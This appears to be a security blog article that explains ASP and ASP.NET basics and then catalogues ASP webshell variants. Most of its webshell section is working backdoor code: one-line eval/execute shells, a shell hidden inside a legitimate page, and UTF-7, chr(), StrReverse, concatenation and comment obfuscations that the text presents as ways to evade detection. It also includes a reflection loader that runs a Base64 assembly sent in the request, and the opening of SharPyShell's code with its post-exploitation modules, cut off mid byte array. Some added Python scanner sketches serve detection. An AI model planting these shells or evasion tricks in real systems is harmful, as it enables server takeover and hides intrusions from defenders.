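1. Active Server Pages (ASP)

ASP (Active Server Pages) is a technology developed by Microsoft as a replacement for CGI scripts. It can interact with databases and other programs and is a simple, convenient programming tool. ASP page files use the .asp extension. It is commonly used today in all kinds of dynamic websites.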

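0x1: ASP script types

Microsoft's ASP language went through a fairly long development cycle. In essence, Microsoft embedded the script execution capability of the PC into the server side (it was later integrated into IIS).

1. VBScript: the VB language
1) ADO (ActiveX Data Object): this component makes database operations from a program very simple
2) COM+
2. Javascript: strictly speaking, Javascript is not a language exclusive to browsers. Any host program that is built with a Javascript JIT engine can interpret and run Javascript code, and IIS ASP integrates a Javascript engine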

Basic ASP syntax

//Note: language and CodePage can both be omitted, in which case the default is VBScript
<%@ language="javascript"%>
<% Response.Write("Hello World!") %>

//javascript can be abbreviated as jscript
<%@ language="jscript"%>
<% Response.Write("Hello World!") %>

<%@ CodePage= Language="VBScript"%>
<% Response.Write("Hello World!") %>

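0x2: ASP built-in objects and references to ActiveX components

ASP provides a set of components that encapsulate data and program code. Their purpose is to

1. Extend functionality
2. Simplify development

At the same time, this rich functionality gives full-featured webshells (so-called "big" webshells) what they need: such a webshell can use these extension component APIs to implement file management and command execution.
ASP provides six built-in objects that can be used directly without prior declaration:

1. Request: receives information from the client
2. Response: sends information to the user
3. Server: controls the ASP runtime environment
4. Session: stores information about an individual user so that it can be reused
5. Application: stores data for use by multiple users
6. ObjectContext: lets ASP programs work directly with MTS for distributed transaction processing

Besides the built-in objects, ASP can also use ActiveX components. An ActiveX component must first be registered on the server; an instance of the component is then created with the CreateObject method of the Server object.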

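0x3: The global.asa file

The Global.asa file is an optional file that can contain declarations of objects, variables and methods that can be accessed by every page in the ASP application. Any valid script code can be used in Global.asa.
The Global.asa file can contain the following

1. Application events
2. Session events
3. <object> declarations
4. TypeLibrary declarations
5. #include directives
//The Global.asa file must be stored in the root directory of the ASP application, and each application can have only one Global.asa file

Events in Global.asa
In Global.asa we can tell the application and session objects what to do when they start and when they end. The code that does this is placed in event handlers. The Global.asa file can contain four types of events

1. Application_OnStart: this event occurs when the first user calls the first page of the ASP application. It occurs after the web server is restarted or after the Global.asa file is edited
2. Session_OnStart: this event occurs every time a new user requests his or her first page in the ASP application
3. Session_OnEnd: this event occurs every time a user ends a session. A session ends if no page is requested within the specified time (the default time is  minutes)
4. Application_OnEnd: this event occurs after the last user ends their session. Typically, it occurs when the web server stops. This subroutine is used to clean up settings after the application stops, such as deleting records or writing information to a text file

A Global.asa file may look like this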

<script language="vbscript" runat="server">

sub Application_OnStart
'some code
end sub

sub Application_OnEnd
'some code
end sub

sub Session_OnStart
'some code
end sub

sub Session_OnEnd
'some code
end sub

</script>

Because the ASP script delimiters (<% and %>) cannot be used to insert script into the Global.asa file, we have to use the HTML <script> element

<object> declarations
Objects with session or application scope can be created in the Global.asa file by using the <object> tag.
The <object> tag should be placed outside the <script> tag

<script language="vbscript" runat="server">

sub Application_OnStart
'some code
end sub

sub Application_OnEnd
'some code
end sub

sub Session_OnStart
'some code
end sub

sub Session_OnEnd
'some code
end sub

</script>

/*
1. scope: sets the scope of the object
1) Session
2) Application
2. id: specifies a unique id for the object
3. ProgID: an id associated with a ClassID. The format of ProgID is: [Vendor.]Component[.Version]
4. ClassID: specifies a unique id for a COM class object
//Either ProgID or ClassID must be specified
*/
<object runat="server" scope="scope" id="id"
{progid="progID"|classid="classID"}>
....
</object>

Examples

Creates a session-scope object named "MyAd" using the ProgID parameter

<object runat="server" scope="session" id="MyAd" progid="MSWC.AdRotator">
</object>

Creates an object named "MyConnection" using the ClassID parameter

<object runat="server" scope="application" id="MyConnection"
classid="Clsid:8AD3067A-B3FC-11CF-A560-00A0C9081C21">
</object>

The objects declared in this Global.asa file can be used by any script in the application, for example in an .ASP file:

<%=MyAd.GetAdvertisement("/banners/adrot.txt")%> 

Relevant Link:

https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspx
https://en.wikipedia.org/wiki/Visual_Basic
https://technet.microsoft.com/zh-cn/library/dn249912.aspx
https://msdn.microsoft.com/en-us/mt173057.aspx
https://technet.microsoft.com/zh-cn/library/bb978526.aspx
https://technet.microsoft.com/zh-cn/library/hh849834.aspx
http://baike.baidu.com/subview/2616/14622918.htm
http://www.w3schools.com/asp/asp_syntax.asp
http://www.w3school.com.cn/asp/asp_globalasa.asp

2. ASP.NET

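1. ASP.NET is the next generation of ASP. It is not compatible with classic ASP, but ASP.NET can reference ASP
2. ASP.NET pages are compiled, so they are faster than classic ASP
3. ASP.NET has better language support, a large set of user controls, XML-based components, and integrated user authentication
4. ASP.NET pages have the extension .aspx and are usually written in VB (Visual Basic) or C# (C sharp)
5. User controls in ASP.NET can be written in different languages, including C++ and Java
6. When a browser requests an ASP.NET file, the ASP.NET engine reads the file, compiles and executes the scripts in it, and then returns the result to the browser as plain HTML

0x1: ASP.NET script types

ASP.NET supports development in the following languages

1. Visual Basic (VB.NET)
2. C# (C sharp)
3. J# (pronounced J sharp)

ASP.NET is a development framework for building web pages and websites with HTML, CSS, JavaScript and server scripts. ASP.NET supports three development models

1. Web Pages: single-page model
2. MVC: Model View Controller
3. Web Forms: event-driven model

0x2: Web Pages (single-page model)

Web Pages is one of the three ASP.NET programming models used to create ASP.NET websites and web applications, and it is the simplest of them. It provides an easy way to combine HTML, CSS, JavaScript and server code. Web Pages is extended through programmable Web Helpers, covering databases, video, images, social networking and more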

<html>
<body>
<h1>Hello Web Pages</h1>
<p>The time is @DateTime.Now</p>
</body>
</html>

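0x3: The ASP.NET MVC programming model

MVC is one of the three ASP.NET development models. It is a framework for building web applications using the MVC (Model View Controller) design

1. Model: represents the core of the application (for example, a list of database records)
2. View: displays the data (the database records)
3. Controller: handles input (writing database records)

The MVC model also gives full control over HTML, CSS and JavaScript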

Relevant Link:

http://www.w3school.com.cn/aspnet/webpages_intro.asp
http://www.w3school.com.cn/aspnet/
http://www.w3school.com.cn/aspnet/mvc_intro.asp
http://www.w3school.com.cn/aspnet/aspnet_intro.asp

3. ASP webshell variants

0x1: One-liner webshell

<%
execute request("op")
%>
<%execute request(chr())%>

<%
eval request("op")
%>
<%eval request.form("#")%>
<%eval request.item("#")%>
<%Eval(Request(chr()))%> password:#
<%Eval(((Request(chr()))))%> multiple pairs of parentheses are allowed

0x2: Inserting a webshell into a legitimate file

When a one-liner is added to an existing asp file, a type mismatch error occurs


Adding an error-tolerance statement solves this problem

<% @Language="VBScript" %>
<%
Option Explicit
On Error Resume Next
execute request("op")
Response.Buffer = True
Dim nVar, strVar, i
nVar =
strVar = "Hello World"
For i= To nVar
Response.Write strVar
Response.Write "<br>"
Next
Response.End
%>

Or use eval instead of execute

<% @Language="VBScript" %>
<%
Option Explicit
eval request("op")
Response.Buffer = True
Dim nVar, strVar, i
nVar =
strVar = "Hello World"
For i= To nVar
Response.Write strVar
Response.Write "<br>"
Next
Response.End
%>

0x3: Using CreateObject to create ActiveX objects that run a WEBSHELL

<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language = "VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")
''password: #
%>

The following analyzes, piece by piece, how the WEBSHELL code works

1. ASP built-in object: server creates the object

The CreateObject method creates an instance of a server component. If the component has implemented the OnStartPage and OnEndPage methods, the OnStartPage method is called at this time.

CreateObject(
progID
)
//progID: Specifies the type of object to create. The format for progID is [Vendor.] Component[ .Version].

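2. The MSScriptControl.ScriptControl.1 object

The Microsoft(R) Script control lets users create applications that run any ActiveX(R) scripting engine, such as Microsoft(R) Visual Basic(R) Scripting Edition or Microsoft(R) JScript(TM). Users can add the object model of any Automation object to the Script control, so that the methods and properties of that object become available to the scripting engine. By combining the object model of an application with a scripting engine, users can create a scripting application that has the advantages of both: the simplicity of a scripting language together with the objects, methods and properties of a more advanced, full-featured professional application
The Microsoft Script control can be created either as a control or as a standalone Automation object. This allows an application written in any language to use ScriptControl to host any compatible scripting language

3. Choosing a scripting language

Configure the Script Control with the correct scripting language. When the Script Control is created as a control on a page, the Language property is automatically initialized to "VBScript". When the Script Control is created as an Automation object, the Language property is left uninitialized and must be set by the code author. To set the Language property to JScript, use the Properties window. The Language property can also be set in code, as shown below

ScriptControl1.Language = "JScript"
//Other scripting languages, such as PERL and REXX, are not provided by Microsoft but can also be used with the Script control

4. Let the host application expose an object model to the script code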

ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application

0x4: Running a WEBSHELL with ExecuteGlobal

<%ExecuteGlobal request(chr())%> 

0x5: Deploying WEBSHELL code in a script tag

<script language=VBScript runat=server>
if request(chr())<>"" then
ExecuteGlobal request(chr())
end if
</script>

0x6: UTF7 WEBSHELL

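MIME (Multipurpose Internet Mail Extensions) does not define Unicode as a permitted character set, nor does it specify how it should be encoded. Although some other encodings (such as UTF-8) have been used in mail, they use values between 128 and 255 to represent Unicode characters, which is a disadvantage when encoding and decoding character sets other than US-ASCII
Because many mail gateways and systems cannot correctly transmit eight-bit US-ASCII codes, characters that use extended US-ASCII lose bits. Since UTF-7 uses only 7 bits and leaves the highest bit unused, UTF-7 encoded data can be transmitted intact through these systems
For some US-ASCII characters and for characters outside US-ASCII, UTF-7 uses a "shifted" encoding and uses a reserved US-ASCII character as the shift character. UTF-7 divides Unicode characters into three classes

1. Directly encoded characters, that is, characters encoded directly as US-ASCII. This class includes upper- and lower-case letters, digits, and the following characters (note that the character + is not included)
' ( ) , - . / : ?
2. Optionally directly encoded characters (note that the characters \ and ~ are not included)
! " # $ % & * ; < = > @ [ ] ^ _ ' { | }
3. Unicode characters other than classes 1 and 2

UTF-7 encoding rules

1. direct encoding
Class 1 characters are encoded directly as US-ASCII. Class 2 characters may optionally be encoded either as US-ASCII or with the shifted encoding. Note, however, that in mail headers, encoding class 2 characters directly as US-ASCII may cause some gateways to read them incorrectly
2. Unicode shifted encoding
Characters other than "+" and the class 1 and class 2 characters must use the shifted encoding. The symbol "+" starts the encoded run, which lasts until a carriage return, a line feed or the end of the text is reached, and "-" ends the encoded run. The content between "+" and "-" is represented in Base64
For example: the string "A≠Α" (Unicode: ) is encoded as: A+ImADkQ- (ASCII: 2B 6D 6B 2D)
The special character "+" is encoded as 2B2D(H). When the encoding 2B2D(H), that is "+-", appears, 2D(H) is treated as void and ignored. So decoding 2B2D(H) gives the string "+", not "+-". Only the encoding 2B2D2D(H) decodes to the string "+-".
3. Space (dec ), tab (dec ), carriage return (dec ) and line feed (dec ) are encoded directly as US-ASCII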

WEBSHELL example

<%@codepage=%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>
/*
After decoding
<%@codepage=65000%>
<%response.codepage=936:eval request("#")%>
*/
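
The Python sketch below is an added example, not code from the original post. It shows why a plain keyword match misses the sample above and how a scanner can handle it: when a page declares code page 65000, decode the UTF-7 shift sequences first and match on the result. The decoder is written to drop incomplete 16-bit groups such as "+k-", which is what the decoded form shown above implies; the function names and the SAMPLE string (the sample above with the code page value taken from its decoded form) are assumptions made for illustration.

```python
import re

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
UTF7_DIRECTIVE = re.compile(r'codepage\s*=\s*"?65000', re.I)
DYNAMIC_EXEC = re.compile(r'\b(?:eval|execute|executeglobal)\b[\s(]*request\b', re.I)


def lenient_utf7_decode(text):
    """Decode UTF-7 shift sequences; incomplete 16-bit groups are dropped."""
    out, i, n = [], 0, len(text)
    while i < n:
        ch = text[i]
        i += 1
        if ch != "+":
            out.append(ch)              # directly encoded character
            continue
        if i < n and text[i] == "-":    # "+-" is a literal plus sign
            out.append("+")
            i += 1
            continue
        bits = nbits = 0
        units = bytearray()             # UTF-16BE code units decoded so far
        while i < n and text[i] in B64:
            bits = (bits << 6) | B64.index(text[i])
            nbits += 6
            if nbits >= 16:
                nbits -= 16
                units += ((bits >> nbits) & 0xFFFF).to_bytes(2, "big")
                bits &= (1 << nbits) - 1
            i += 1
        if i < n and text[i] == "-":    # the terminating "-" is absorbed
            i += 1
        out.append(units.decode("utf-16-be", errors="replace"))
    return "".join(out)


def scan_asp(source):
    """Match the dynamic-execution pattern before and after UTF-7 decoding."""
    declares_utf7 = bool(UTF7_DIRECTIVE.search(source))
    # Decoding the whole file may mangle a legitimate "+" in script code;
    # that is acceptable here because the result is only used for matching.
    decoded = lenient_utf7_decode(source) if declares_utf7 else source
    return {
        "declares_utf7": declares_utf7,
        "raw_hit": bool(DYNAMIC_EXEC.search(source)),
        "decoded_hit": bool(DYNAMIC_EXEC.search(decoded)),
        "decoded": decoded,
    }


# Constructed test input: the page's sample with the 65000 directive restored.
SAMPLE = ('<%@codepage=65000%>\n'
          '<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=:e+k-v+k-a+k-l '
          'r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>')

if __name__ == "__main__":
    result = scan_asp(SAMPLE)
    print(result["raw_hit"], result["decoded_hit"])
    print(result["decoded"])
```

A file that declares code page 65000 is itself worth reporting, since the post gives no legitimate reason for an ASP page to be stored as UTF-7.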

Relevant Link:

http://www.aspheute.com/english/20011123.asp
https://msdn.microsoft.com/en-us/library/ms524786(v=vs.90).aspx
https://msdn.microsoft.com/en-us/library/aa227633(v=vs.60).aspx
http://www.jb51.net/article/53368.htm
https://support.microsoft.com/en-us/kb/185697
https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
http://www.wpuniverse.com/vb/showthread.php?35313-ScriptControl-Another-Method-to-run-VBScript-Code
http://www.cnblogs.com/fvan/archive/2006/02/26/338326.html

0x7: MS Script Encoder Decoded(VBScript)

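1. VBScript is a scripting language produced by Microsoft. It is a lightweight version of Microsoft's programming language Visual Basic, and it is also the default scripting language of ASP (Active Server Pages)
2. Writing the line <%@ language="language" %> above the <html> tag makes it possible to write subroutines or functions in another scripting language:
/*
<% @Language="VBScript" %>
<%
..
%>
*/

Microsoft provides a Script Encoder tool for ASP that can encode the VBScript or JScript in an ASP file, so that the whole ASP script file looks like garbled text, for example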

<script language="VBScript.Encode">
#@~^KQAAAA==@#@&j1D
bwYc214W,J3x1W[roPbdP1WW^ZZJ@#@&PQsAAA==^#~@</script>

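If ASP finds VBScript.Encode in the declaration at the head of the file and then detects the following in the content after it

#@~^
..
^#~@

it automatically decrypts the ciphertext inside #@~^(content)^#~@ and then interprets and executes it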

Relevant Link:

http://ayra.ch/service/vbs/vbs.asp
http://www.runoob.com/vbscript/vbscript-tutorial.html
http://www.microsoft.com/china/vbscript/vbstutor/vbswhat.htm
http://blog.miniasp.com/post/2008/03/19/ASP-VBScript-Encoding-Decoding-Tool-Script-Encoder.aspx

0x8: Running a WEBSHELL by passing the external parameter through a variable

<%
a = request("op")
eval(a)
%>

Another way of passing it through a variable

<%if request ("")<>""then session("")=request(""):end if:if session("")<>"" then execute session("")%>

0x9: Bypassing detection rules with comment-based junk code

<%@ Page Language = Jscript %>
<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+
"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval
(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
//password: -

<%@ Page Language="Jscript"%>
<%eval(Request.Item["shezhang"],"unsafe");%>
//the password is webadmin

Relevant Link:

http://www.jb51.net/article/11142.htm
https://msdn.microsoft.com/en-us/library/aa260861(v=vs.60).aspx

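0x10: Bypassing detection signatures with a custom encoding function

StrReverse/Replace encryption; after decryption it is: Execute eval request("cmd")

<%
Function decode(Code)
decode=Replace(StrReverse(Code),"/*/","""") 'The function name is used as a variable that holds the value to return. """" stands for a single double-quote character; only """" works, anything else raises an error
End Function
Execute decode(")/*/dmc/*/(tseuqer lave") 'eval request(/*/cmd/*/)
%>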

0x11: Hiding characters with chr and joining them with the + sign

<%eval (eval(chr()+chr()+chr()+chr()+chr()+chr()+chr())(""))%>

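0x12: Using the ASP & concatenation operator

In ASP the & sign is mainly used for concatenation, including mixed concatenation such as string-string, string-variable and variable-variable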

<%
response.write("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&""&"-"&""&"-"&""&")"&")")
eval("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&""&"-"&""&"-"&""&")"&")")
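%>
//eval(request(0-2-5))

Note that ASP is fairly loose about the format of function calls: parentheses between the function name and its arguments are not mandatory, for example

call myfunc(x,y) or call mysub(x,y)
is equivalent to:
myfunc x,y or mysub x,y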

0x13: Custom command-execution function

<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding().
GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
%>

0x14: Hiding sensitive keywords with Replace and StrReverse

<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%> password:z

0x15: Using an if-else check on the request

<%if Request("LandGrey")<>"" then ExecuteGlobal request("LandGrey") end if %>

0x16: Substituting the request variable

<%if request("LandGrey")<>""then session("LandGrey")=request("LandGrey"):end if:if session("LandGrey")<>"" then execute session("LandGrey")%>

0x17: Running code from a class constructor and destructor

Class initialization:

<%
Class LandGrey
Private Sub Class_Initialize
eval (request("LandGrey"))
End Sub
End Class

Set X = New LandGrey
%>

Class termination:

<%
Class LandGrey
Private Sub class_terminate
eval (request("LandGrey"))
End Sub
End Class

Set X = New LandGrey
Set X = Nothing
%>

0x18: Using ASP's built-in CreateObject to create a ScriptControl component object and then run VBScript code

<%@ language = VBscript %>
<%<!--%^_^%-->
SET LandGrey = server.CreateObject("mS"&chr()&"cR"&chr()&"pTCo"&Chr()&Chr()&"rOL.Sc"&chr()&"IpTCo"&Chr()&Chr()&"rOL.1")
LandGrey.lANguaGE = cHr()&"BsC"&CHR()&chr()&"PT"
LandGrey.AddObject "REsponse", Response
LandGrey.AddObject "r"&chr()&"quEst", requesT
LandGrey.AddObject "s"&chr()&"ssIon", sessiOn
LandGrey.AddObject "serv"&chr()&"r", serVer
LandGrey.AddObject "apPlic"&CHR()&"tIon", application
LandGrey.eXECuTeStAtEmENt("eV"&CHr(&)&"L"&Chr()&"rEqU"&cHr()&"St("&chr()&"LandGrey"&chr()&CHR()&")")
%>
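
The variants in 0x9 to 0x14 and 0x18 hide the same few tokens behind comments, chr() calls, & or + concatenation and StrReverse, so a scanner has to undo those transforms before matching. The Python sketch below is an added example (not from the original post) that covers several of these sections in one pass: it builds a folded view and a reversed-literal view of a file and matches on each. The samples are constructed fragments modelled on the snippets above, and the function and rule names are assumptions made for illustration.

```python
import re

# Heuristic patterns; the rule labels are illustrative, not from any product.
COMMENT = re.compile(r"/\*.*?\*/", re.S)                    # /* ... */ junk (0x9)
CHR_CALL = re.compile(r"\bchrw?\s*\(\s*(\d+)\s*\)", re.I)   # chr(N) (0x11, 0x18)
CONCAT = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')        # "a" & "b" (0x12)
LITERAL = re.compile(r'"([^"]*)"')
DYNAMIC_EXEC = re.compile(
    r'\b(?:eval|execute(?:global|statement)?)\b[\s("]*request\b', re.I)
SCRIPT_CONTROL = re.compile(r"msscriptcontrol\.scriptcontrol", re.I)


def _chr_literal(match):
    """Turn chr(N) into a one-character string literal."""
    code = int(match.group(1))
    ch = chr(code) if 32 <= code < 127 else "?"
    # chr(34) is rendered as a single quote so the folded literal stays one token.
    return '"%s"' % ("'" if ch == '"' else ch)


def normalize(source):
    """Strip comments, resolve chr() calls and fold adjacent string literals."""
    text = COMMENT.sub("", source)
    text = CHR_CALL.sub(_chr_literal, text)
    while True:
        folded = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if folded == text:
            return text
        text = folded


def scan(source):
    """Return (view, rule) pairs for every rule that fires on any view."""
    views = {
        "raw": source,
        "folded": normalize(source),
        # StrReverse view (0x10, 0x14): each literal of the raw source, reversed.
        "reversed": "\n".join(lit[::-1] for lit in LITERAL.findall(source)),
    }
    hits = []
    for name, text in views.items():
        if DYNAMIC_EXEC.search(text):
            hits.append((name, "dynamic-exec-of-request"))
        if SCRIPT_CONTROL.search(text):
            hits.append((name, "scriptcontrol-progid"))
    return hits


# Constructed samples, modelled on sections 0x12, 0x14, 0x18 and 0x9.
S_CONCAT = ('<%\neval("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"'
            '&"("&""&"-"&""&"-"&""&")"&")")\n%>')
S_REVERSED = r'''<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>'''
S_CHR = ('Set o = Server.CreateObject("mS"&chr(115)&"cRipTCo"&Chr(110)'
         '&"trOL.Sc"&chr(114)&"IpTControl.1")\n'
         'o.ExecuteStatement("eV"&Chr(65)&"L rEqU"&cHr(101)&"St("'
         '&chr(34)&"k"&chr(34)&")")')
S_COMMENT = ('<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+'
             '/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/]"+")";%>')

if __name__ == "__main__":
    for label, sample in [("concat", S_CONCAT), ("reversed", S_REVERSED),
                          ("chr", S_CHR), ("comment", S_COMMENT)]:
        print(label, scan(sample))
```

None of the four samples matches in the raw view, which is the point of the variants above. The sketch does not follow a request value through a variable or the Session object (0x8, 0x16), so those forms need a separate rule.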

Relevant Link:

https://xz.aliyun.com/t/2356 

0x19: Using the ASP reflection mechanism to dynamically load DLL shellcode

<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
public class Handler:IHttpHandler
{
public void ProcessRequest(HttpContext context){
if (context.Request["list"]!=null)
System.Reflection.Assembly.Load(Convert.FromBase64String(context.Request["res"])).CreateInstance("U").Equals(context);
}
public bool IsReusable {
get {
return false;
}
}
}
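
The handler above passes request data straight into Assembly.Load, and that source-to-sink pattern can be checked for statically. The Python sketch below is an added example, not part of the original post: it extracts the argument of each Assembly.Load call with balanced-parenthesis matching and reports the call when the argument reads from the HTTP request. The function names and the embedded HANDLER sample (the handler above, re-indented) are assumptions made for illustration.

```python
import re

LOAD_CALL = re.compile(r"\bAssembly\s*\.\s*Load\s*\(")
# Request members that carry client-controlled data.
REQUEST_SOURCE = re.compile(
    r"\bRequest\s*(?:\[|\.\s*(?:Form|QueryString|Params|Item|InputStream|Cookies|Headers)\b)")


def call_argument(source, open_paren):
    """Return the text between the '(' at open_paren and its matching ')'."""
    depth, i, in_string = 0, open_paren, False
    while i < len(source):
        ch = source[i]
        if in_string:
            if ch == "\\":
                i += 1                  # skip the escaped character
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return source[open_paren + 1:i]
        i += 1
    return source[open_paren + 1:]      # unbalanced input: return the rest


def request_fed_loads(source):
    """List Assembly.Load calls whose argument reads from the HTTP request."""
    results = []
    for match in LOAD_CALL.finditer(source):
        argument = call_argument(source, match.end() - 1)
        # Only direct use is detected; a value copied into a variable first
        # is not followed.
        if REQUEST_SOURCE.search(argument):
            results.append({
                "line": source.count("\n", 0, match.start()) + 1,
                "argument": argument.strip(),
                "base64": "FromBase64String" in argument,
            })
    return results


# Constructed test input: the handler shown above, re-indented.
HANDLER = '''<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
public class Handler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        if (context.Request["list"] != null)
            System.Reflection.Assembly.Load(Convert.FromBase64String(context.Request["res"])).CreateInstance("U").Equals(context);
    }
    public bool IsReusable { get { return false; } }
}
'''

if __name__ == "__main__":
    for finding in request_fed_loads(HANDLER):
        print(finding)
```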

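0x20: SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications

SharPyShell is a small, obfuscated ASP.NET webshell for C# web applications. It executes commands received over an encrypted channel and compiles them in memory at runtime.

SharPyShell is a post-exploitation framework written in Python that can:

  • Generate an obfuscated webshell (generate)
  • Emulate a Windows terminal as the interaction with the webshell (interact)

The main goals of the framework are:

  • To give penetration testers a set of tools that simplify the post-exploitation phase after an IIS webserver has been successfully exploited
  • The tool is not a replacement for C2 server frameworks (such as Meterpreter, Empire, etc.), but it is well suited to server environments where inbound and outbound connections are completely restricted. It includes all the privesc, netdiscovery and lateral movement tools you are likely to use from cmd on the target server
  • To execute C# code and PowerShell modules in memory as stealthily as possible
  • The obfuscation implemented in SharPyShell is intended to evade file signature and network signature detection. To evade network signature detection, a fully encrypted channel was developed for sending commands and receiving output
  • File signature detection is evaded by using reflection on a precompiled DLL that is responsible for compiling C# code at runtime.

Modules:

  • #download Download a file from the server
  • #exec_cmd Run a cmd.exe /c command on the server
  • #exec_ps Run powershell.exe -nop -noni -enc 'base64command' on the server
  • #invoke_ps_module Run a ps1 script on the target server
  • #invoke_ps_module_as Run a ps1 script on the target server as a specific user
  • #lateral_psexec Run the psexec binary (lateral movement)
  • #lateral_wmi Run built-in WMI commands (lateral movement)
  • #mimikatz Run an offline version of mimikatz directly in memory
  • #net_portscan Run a port scan using regular sockets
  • #privesc_juicy_potato Launch the Juicy Potato attack to impersonate the NT AUTHORITY\SYSTEM user
  • #privesc_powerup Run the Powerup module to assess all privesc misconfigurations
  • #runas Run a cmd.exe /c command, spawning a new process as a specific user
  • #runas_ps Run powershell.exe -enc, spawning a new process as a specific user
  • #upload Upload a file to the server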

<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Reflection" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
string p = "42a9798b99d4afcec9995e47a1d246b98ebc96be7a732323eee39d924006ee1d";
string r = Request.Form["data"];
byte[] a = { /* embedded byte array omitted */
,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x12,0x61,0x39,0x3b,0x39,0x38,0x62,0xb9,0x0,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0